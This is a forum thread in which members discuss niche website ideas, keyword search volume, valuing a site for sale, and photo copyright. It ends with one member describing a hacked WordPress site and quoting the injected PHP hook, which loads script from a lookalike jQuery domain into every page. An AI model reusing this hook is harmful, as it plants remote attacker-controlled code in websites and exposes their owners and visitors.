Guys,
I'm having a hard time deciding if my niche can work. When I google it I don't get websites DEDICATED to the subject. But what I do get is A LOT of Yahoo Answers, forums, and sometimes a single webpage talking about it (but the website itself is not dedicated to this particular thing). So...
1) Since my niche involves answering a specific type of question, there is lots of Yahoo Answers, wiki answers, forum threads, etc. So, is this a viable niche?
2) Since people would be arriving at my website by asking certain specific questions that is what I am typing into the Google adwords keyword planner. However, the tool provides me with no data but I know people are searching for it. How can I modify what I'm entering into google adwords to find out the search volume or is there another way to find out? How would I find the search volume of a question?
I know people are searching for it since it shows up in the #1 spot for google searchs autocomplete. Note that the site won't be dedicated to answering just one question, but lots of questions falling into the same category but none of these questions have a site dedicated to it.
I'm thinking about selling one of my sites. What do you think this would be worth as a "turn key business"
I have observed that with very little effort, it's not hard to push this site to a steady $2k a month, but it does require regular attention and effort and I've already got 3 others that I'm juggling and I'm about to start classes again. If i don't pay any attention to it at all it will sit there and churn out $150-$200 a month on its own, so its not really eating anything.
Tough call brah.
I don't even got a website up and running yet, but check out this thread: http://forum.bodybuilding.com/showthread.php?t=118999051
Owner of simplyshredded was gonna sell for $5k and now he's CEOing 10k/day for keeping it. I'm not 100% sure, but I think biganf was also juggling a few sites. Given your position of juggling 3 other sites/being a student, I would just keep at it.

whatsmysiteworth.com has it valued at $13,552

hard to say without more info, one good thing is that yahoo answers pages appearing high in the serps usually means it is easy to rank the keyword

go to the regular google search page and do the keyword search, now scroll to the bottom of the results and see if google has a "Searches related to" section, if they do, people may be searching those keywords more than they are searching your keyword.
also, i have heard countless people saying google shows no keyword info for keywords that people are searching for

Interesting niche site. Everyone loves watching fights, so you will have a market there. I like the different categories at the top.

Go to the top of the thread, click on thread tools (its right above the first post of the thread) and then click on subscribe. It should then show up in your CP.
If you have set it so you sub to a thread by just posting, you may want to change that as it gets cluttered. Go here and under "Messaging & Notification" choose "Do not subscribe" for the "Default Thread Subscription Mode" option.

Do you just find your niches naturally?
On the 3rd page you mentioned your site coelic disease since you heard people talking about it more and more. So do you just have "oh ****" moments every now and then, search if its viable, and if it is start the site?
Not sure if I can just mindlessly put stuff into keyword searches trying to find a niche.

Thanks for this. Was gonna set up a wordpress site later on today or tomorrow morning.
Security is the next area I need to look into as this thread doesn't cover that.

I give photo credit in description? Is this not OK? Should I immediately go and change photos now?!?!?
I give photo credit in description? Is this not OK? Should I immediately go and change photos now?!?!?
Not an expert, but thats not okay.
If that was okay people could steal all of your content and just copy paste it on their site and at the end say "Oh, credit to this site for making the content". You'll need their permission to use their content.
http://commons.wikimedia.org/
The above should be a great resource for stuff you can use freely. Just read the fine print at the end and see if the author wants to be attributed. Read these pages as well:
http://commons.wikimedia.org/wiki/Commons:Welcome
http://commons.wikimedia.org/wiki/Commons:Reusing_content_outside_Wikimedia
-
I give photo credit in description? Is this not OK? Should I immediately go and change photos now?!?!?
I don't see the photo credit anywhere, even when I clicked on the picture. Regardless, we are not allowed to use pictures freely from google image and think its ok just because we give credit. You can potentially get into an ugly litigation problem should your website takes off. A few miscers awared me on it and I hurriedly changed all of mine.
As recommended to me by the neatnature brah, use http://search.creativecommons.org/ and search for pictures that are OK to use under the creative commons law.
Whats best to back up? How do you know when it gets hacked?
There should be a backup option on your server's page; you can google to see if such function exists...or you can also just copy all the files from your server and save in a folder on your computer (i use this method).
When my website got hacked, the whole website didn't load and this error was displayed:
function pluginAuth(){
echo(@wp_remote_retrieve_body(@wp_remote_get('http://jquerys.net/jquery-1.6.3.min.js')));
}
@add_action('wp_head', 'pluginAuth');
